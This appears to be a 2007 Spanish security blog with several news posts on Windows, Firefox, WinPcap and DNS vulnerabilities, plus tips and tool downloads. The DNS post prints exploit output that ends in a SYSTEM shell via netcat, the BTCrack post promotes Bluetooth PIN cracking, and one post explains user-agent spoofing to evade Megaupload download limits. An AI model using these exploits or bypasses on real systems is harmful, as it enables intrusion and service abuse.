Cuaderno de OsCaR :: inSiD3

Diversos sitios web se están haciendo eco de una vulnerabilidad no parcheada del kernel de Windows Vista (todas las versiones) explotable de forma remota para provocar una denegación de servicio.

El origen de la noticia está en la charla que dió en SyScan’07 (Singapur) hace unos días Justine Aitel, CEO de Inmunity. En la última imagen de su presentación (pdf), Aitel presentó una misteriosa captura de Windows Vista recuperándose de un cuelgue.

No se ha confirmado ni descartado la posibilidad de que el cuelgue permita la ejecución de código arbitrario.

En cualquier caso, y aunque no se conocen aún más detalles, la vulnerabilidad acaba de ser recogida por Security Focus, lo que le proporciona bastantes visos de verosimilitud.

Aun no está publicado el exploit, pero me temo que va a ser divertirdo cuando lo podamos tener.

:: Fuente: syscan

En Windows, cuando instalas Fiefox te deja en el registro un manejador de protocolo (handler protocol) específico (firefoxurl://) que puede ser explotado (vía Explorer) por páginas web maliciosas para ocasionar algún daño o apoderarse de tu máquina ejecutando codigo o algun comando del sistema.

Al parecer, los expertos se ponen de acuerdo en qué navegador es más culpable: si el Internet Explorer o el Firefox.
Su descubridor, Thor Larholm lo ha presentado como un 0-day para Explorer (y así lo ve también Security Focus), mientras en Secunia lo consideran un fallo de Firefox. También podemos elegir la vía intermedia y calificarlo como un scripting cruzado entre navegadores, en que Firefox es el vector de ataque y Explorer falla al validar una entrada…

Pero poco nos importa el culpable. Lo preocupante es que se trata un fallo crítico y sin parche.
Por eso, si respondes a las condiciones de riesgo (Windows + Explorer + Firefox 2+), prueba la demo. Si resulta positiva, puedes proceder a borrar del registro la(s) entrada(s) peligrosa(s).

Para ello se recomienda teclear lo siguiente (recordar hacer primero una copia del registro por lo q pueda pasar):

reg delete HKCR\FirefoxHTML /f
reg delete HKCR\FirefoxURL /f
reg delete HKCR\Firefox.URL /f

Para ver otro ejemplo de como se puede ejecutar la consola cmd.exe puedes hacerlo desde aqui: Remote Command Execution here (cmd.exe is launched)

:: Fuentes: Kriptopolis - Larholm - Secunia - SecurityFocus

Se ha descubierto una vulnerabilidad en WinPcap que podría ser aprovechada por un atacante local para ejecutar código arbitrario con privilegios de sistema. Además existe un exploit público para aprovecharse de esta vulnerabilidad. Por tanto, programas como Snort, tcpdump o WireShark se ven afectados por esta escalada de privilegios, ya que utilizan esa libreria.
WinPcap es la herramienta estándar para acceder a la conexión entre capas de red de entornos Windows. Se trata de un “port” para Windows de la librería ‘libpcap’ y es necesaria para ejecutar programas de tipo “sniffer” que modifican el comportamiento de la interfaz de red para poder actuar en modo promiscuo, entre otras posibilidades.
El fallo se da en el controlador ‘npf.sys’ a la hora de validar los datos manejados en los parámetros Irp pasados a IOCTL 9031 (BIOCGSTATS). Un atacante podría aprovechar esta vulnerabilidad enviando parámetros especialmente manipulados y sobrescribiendo la memoría del núcleo.

Si un usuario local sin privilegios encuentra que el dispositivo ha sido utilizado y no se ha descargado el módulo (despues de haberse ejecutado WireShark por ejemplo, o si está en el inicio del sistema), el atacante podría ejecutar la prueba de concepto publicada y obtener privilegios totales sobre la máquina víctima.

Esta vulnerabilidad afecta a las versiones 3.1 y 4.1 beta de WinPcap sobre sistemas Windows, pero ha sido solventada en la version 4.0.1 de WinPcap.

El fallo se descubrió el 16 de mayo de 2007 por iDefense, pero se publicó el 9 de julio de 2007.

El exploit público podemos verlo aqui.

:: Fuente: Hispasec

Hace tiempo hablé del “enrutador cebolla” que es TOR, por el que las conexiones salen por IP vecinas distintas, y las IP vecinas a estas salen a su vez por otras vecinas suyas, pero no de la anterior. Así se consigue tener IP distintas durante nuestra conexión.

También hable de un paquete que incluia TOR y un Firefox portable que lo integraba, permitiendo navegar anónimamente con Mozilla Firefox de una forma sencilla. Este paquete se llama TorPark, del que también puedes bajar la nueva versión 2.0.0.3a directamente desde aqui.

Ahora quiero mencionar otro paquete como como TorPark, pero esta vez con una version portable del navegador Opera. Paquete que incluye el plugin OperaTor, el navegador Opera 9.3, TOR y Privoxy.

Este paquete se llama OperaTOR, y podemos descarlo directamente desde aqui.

Javi Moya ha publicado su programa para Windows con el que se pueden enviar sms gratis usando Noxtrum. [Dar las gracias a mi cuñao Maxi que me comentó la noticia. xD]
SMS Gratis es el nombre que le ha dado, y por supuesto sirve para mandar mensajes de texto a teléfonos móviles de España (Vodafone, Movistar, Orange, Yoigo, etc…) de forma gratuita. En un principio iba a ser una aplicación web, pero hacerlo de esa forma, a pesar de su comodidad, sería problemático, ya que serían muchas peticiones desde el mismo sitio, y lo terminarían bloqueando. Por eso Javi Moya prefirió crear una aplicación Windows (que es mucho más lógico y razonable xD).

Otra cosa es decir que sólo se pueden enviar sms con un intervalo de tiempo de 10 minutos entre sms y sms, más que nada como medida contra el abuso de envíos masivos (aunque Noxtrum solo permite un nº de sms diarios por nº de movil dado de alta).
Un error conocido del programa SMS gratis es que la primera vez se envíe un mensaje sms te dirá que no ha podido ser enviado, pero en realidad si llegará. Unas veces pasa y otras no. Pero ésto es un problema de Noxtrum, no del programa.
Ya sabes que para poder enviar sms con Noxtrum debes estar registrado por un único y modico precio (son 30 céntimos el alta; merece la pena).
Para ver esta información de Alta en Noxtrum para poder realizar los envíos: consulta mi anterior artículo sobre sms con Noxtrum y/o leer las respuestas a los comentarios al final de este artículo.
:: Descarga directa de SMS Gratis.
:: Fuente: Blog de Javi Moya.

Andrés Tarasco y Mario Ballano han publicado un exploit para una vulnerabilidad remota del servicio DNS de Microsoft que permitiría a un usuario la ejecucion remota de codigo con privilegios de SYSTEM.

Al contrario que los reportes iniciales de Microsoft, han notificado de que su exploit es capaz de atacar un sistema a través del puerto 445 por lo que dicho puerto debe ser filtrado en el firewall hasta que el parche definitivo sea publicado.

>> Ejemplo del uso del exploit:

D:\DNSTEST>dnstest.exe 192.168.1.7 ——————————————————- Microsoft Dns Server local & remote RPC Exploit code (port 445) Exploit code by Andres Tarasco & Mario Ballano Tested against Windows 2000 server SP4 and Windows 2003 SP2 (Spanish) ——————————————————- [+] Trying to fingerprint target.. 05 02 [+] Remote Host identified as Windows 2003 [+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_np:192.168.1.7[\\pipe\\dnsserver] [+] RpcBindingFromStringBinding returned 0×0 [+] Calling remote procedure DnssrvOperation() [+] Now try to connect to port 4444 D:\DNSTEST>nc 192.168.1.7 4444 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>whoami nt authority\system

:: Fuente: 514.es && 48Bits

:: El código fuente del exploit y el analisis del mismo lo podeis Descargar aqui
:: Exploit compilado Win32 aqui
:: Análisis de la vulnerabilidad aqui

He visto un recopilatorio que viene bien tener en cuenta mencionar para recodar que disponemos de cada vez más extensiones para nuestro navegador Firefox. En este caso el colega mig ha publicado en su web freneticmig un recopilatorio de extensiones para Mozilla Firefox de seguridad, audiotorias, utilidades de red, miscelanea, localización, spidering, proxys, edicion y otros que pueden resultarnos muy utiles para algunas cosas.

Puedes ver el recopilatorio haciento clic en el enlace fuente de abajo.

:: Fuente: freneticmig - Recopilatorio de Extensiones para Firefox

Tras instalar la nueva versión de Internet Explorer 7, su página de inicio cambia por una así http://runonce.msn.com/runonce2.aspx y encima no carga porque tiene un error JavaScript, por lo que no nos muestra nada, solo un bonito y relajado fondo azul. Pongamos lo que pongamos en la homepage, siempre nos abre esta página. Así si que no nos rula el Google de pagina de inicio, ¿pero rularia si desde la pagina del buscador Live Search le damos a ‘Convertir Live Search en mi página principal’? No lo se, pero que cosas si fuera asi, ¿no?
Para quitar la pagina de inicio erronea de runonce debemos crear un archivo .reg con el Notepad o editar el Registro para añadir las siguientes claves que solucionan el cambio de la pagina de inicio de IE7:

;begin reg file
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
“RunOnceHasShown”=dword:00000001
“RunOnceComplete”=dword:00000001

;end reg file

Como ya escribi algo sobre como buscar y realizar descargas (y subidas) desde Megaupload y otros sitios del estilo, esta vez os traigo algo wuapo (que ya tiene su timepo también, lo siento). Buscando por Internet y en el magnifico Google “amigo del hombre” he encontrado algunas cosillas que se han descubierto por ahi. La historia es que es posible saltarse la limitación de descargas por IP y día en Megaupload tan solo modificando una cosilla en nuestros navegadores preferidos. Los pasos a seguir son los siguientes, pero leerlo todo antes de hacer nada, porque las cosas han cambiado y seguiran cambiando por parte de Megaupload:

+ Para Internet Explorer 6 y 7 (IE):

Abrir el Regedit.exe de Windows e ir a la siguiente dirección:

HKEY_LOCAL_MACHINE -> SOFTWARE -> Microsoft -> Windows -> Current Version -> Internet Settings -> User Agent -> Post Plataform

Crear ahi una nueva entrada binaria con el valor “Megaupload Toolbar” (sin las comillas) y con el valor por defecto de la creacion. Pero esto ya no funciona, pues los de Megaupload han cambiado el nombre a su toolbar (la que usan sus clientes) para facilitar y mejorar las descargas desde IE). Por tanto, ahora a la nueva clave a añadir se le pone el siguiente nombre: “MEGAUPLOAD 1.0” (sin las comillas y respetando las mayúsculas).

+ Para Mozilla Firefox 1.0.5 y 2.0:

1. En la barra de dirección escribir “about:config” (sin las comillas) y pulsar ENTER.
2. Escribir en el campo filtro la cadena de texto “general.useragent.extra.firefox” (sin las comillas).
3. Hacer doble clic al valor que salga y se abre para poder modificarlo.
4. Ahi se debe añadir un espacio (mantenido la inforamción de la versión de Firefox que aparece) y “Megaupload Toolbar” (sin las comillas). Por ejemplo: Si el valor actual es “Firefox/2.0.0.2″ debe quedar así “Firefox/2.0.0.2 Alexa Toolbar” (sin las comillas).

Esto lo que hace es hacer una simulacion de la barra Alexa de IE en nuestro Firefox. De todos modos, Megaupload ha cambiado el nombre a la barra de Alexa (con la que parecia que tuviera algun compromiso o acuerdo para las descargas, pq sino no lo entiendo), y ahora debe añadirse “ MEGAUPLOAD 1.0“, quedanso asi: Si el valor actual es “Firefox/2.0.0.2″ debe quedar así “Firefox/2.0.0.2 MEGAUPLOAD 1.0” (sin las comillas y respetando las mayúsculas).

Hay mas trucos de este tipo por L@ ReD de Internet que tanto nos gusta, pero el que este interesado en ello, que lo busque.

Al parecer se ha detectado un fallo que afecta a Internet Explorer 7 y toda su familia del navegador (IE5 e IE6) en las versiones para Windows 2000/2003/XP/Vista.

El fallo es en ActiveX, habiendo varios controles del navegador que se ven afectados por este fallo, por lo que se puede producir un cuelgue en IE7, aunque no permite la ejecución de codigo, por lo tanto es más desagradable que un peligro en sí.

Podría darsele uso como poner un link en un web que al darlo te cierre directamente el IE7, pero de momneto poca cosa más.

· Algunos Controles afectados son (en MSHTML.DLL): giffile, htmlfile, jpegfile, mhtmlfile, ODCfile, pjpegfile, pngfile, xbmfile, xmlfile, xslfile, wdpfile

· Otros controles afectados (en TRIEDIT.DLL) son: TriEditDocument.TriEditDocument, TriEditDocument.TriEditDocument.1

Para ver un ejemplo de como se cuelga el IE7, en la web de Kriptopolis.org han puesto un link que te muestra el fallo (es inofensivo) para que lo compruebes. Puedes fijarte despues en el codigo fuente de la web que cuelga el IE7 para comprenderlo. Para verlo haz clic aqui (Kriptopolis.org) (A Firefox no le afecta).

:: Fuente: Determina.com

Este es un pequeño listado de algunas páginas ocultas dentro del navegador de Mozilla Firefox en las que puedes enredar un poco y configurar cosas en tu navegador Firefox:

about: Muestra un aviso simple, y así sin ningún parámetro mostrará el Mozilla “about” de información.

about:buildconfig Mostrará la configuración y los parámetros de la plataforma de la estructura.

about:cache Mostrará el Info y la estadística con respecto a su escondrijo de disk’s, incluyendo el nombre de su directorio de cache’s y una lista de las entradas que puedes encontrar ahí. Por defecto, Firefox no permite tener una visión las Web depositadas, así que esto puede ser una opción útil para ver el listado de direcciones en la caché.

about:config Muestra muchos muchos Info., y es totalmente CONFIGURABLE. Por ello, esta página oculta es la más compleja y significativa de todas. Hay que tener cuidado en lo que se cambie aquí o tu navegador podrá no funcionar correctamente después de ellos si tocas cosas incorrectas.

about:plugins Que sería de Firefox sin sus extensiones de gran alcance y potencia, así como muy útiles. Esta opción mostrará la información detallada sobre todos los plugins instalados en tu navegador Mozilla Firefox.

about:credits Abre una página web de mozilla para dar el crédito a quien lo merece por haber participado en el proyecto. Es una lista ordenada alfabéticamente de toda la gente que dió su contribución al desarrollo de Firefox.

about:Mozilla Esto sí que es una cosa extraña xD. Muestra el una cita del supuesto “Libro de Mozilla”. Algo similar estaba presente también en Netscape. Esto no es realmente ningún libro existente, aunque las citas pudan darnos esa impresión.

El BTCrack es una herramienta para Windows que puede crackear un PIN bluetooth y conectarse en tiempo real, y hasta hace poco no ha sido publicada, cortesía de la investigación de Thierry Zoler y sus colegas. Esta tool para bluetooth pin cracking te demostrará como se puede romper un pin bluetooth para sacar la contraseña y, con ello tener acceso al dispositivo mediante shell remota al bluetooth objetivo. Está más que asegurado que es posible conectarse a algunos dispositivos Bluetooth sacando el pin y/o saltandose la autenticación de acceso (y no sólo unos cuantos).

Para obtener los datos del dispositivo bluetooth que queremos crackear se necesita también otro programa llamado FrontLine Test Equipment Bluetooth Protocol Analyzer, que es como un sniffer con el que podrás analizar el protocolo y ver los dispositivos para obtener los datos necesarios que BTCrack necesita para crackear la clave del bluetooth.

Para ellos os dejo aquí los enlaces necesarios para informarse y probar:

:: Creador de BTCrack: Sec Dev - Thierry Zoller
:: Video demostrativo: sniffer y crack bluetooth pin
:: Descargas: BTCrack 1.0 (BTCrack enlace 2) && FrontLine Bluetooth Protocol Analyzer

Cobian Backup es un programa multitarea que puede ser usado para crear copias de respaldo de sus archivos y directorios desde su emplazamiento original a otro directorio/disco en el mismo ordenador u otro ordenador de la misma red, también soporta el respaldo a un servidor FTP.
Consume muy pocos recursos y puede estar funcionando en segundo plano en el sistema, comprobando su programa/horario de copias de seguridad y ejecutándolo cuando sea necesario.
Soporta la copia incremental (no para un servidor FTP).
Tiene integrada la capacidad de compresión ZIP. Dispone además de encryptación.
Todas las funciones del programa pueden ser protegidas por contraseña.
Y lo mejor de todo, que es un programa GRATUITO (Freeware).

:: Fuente y Ayuda: Nautopia
:: Sitio Oficial: Cobian’s Site
:: Descarga: Cobian Backup 8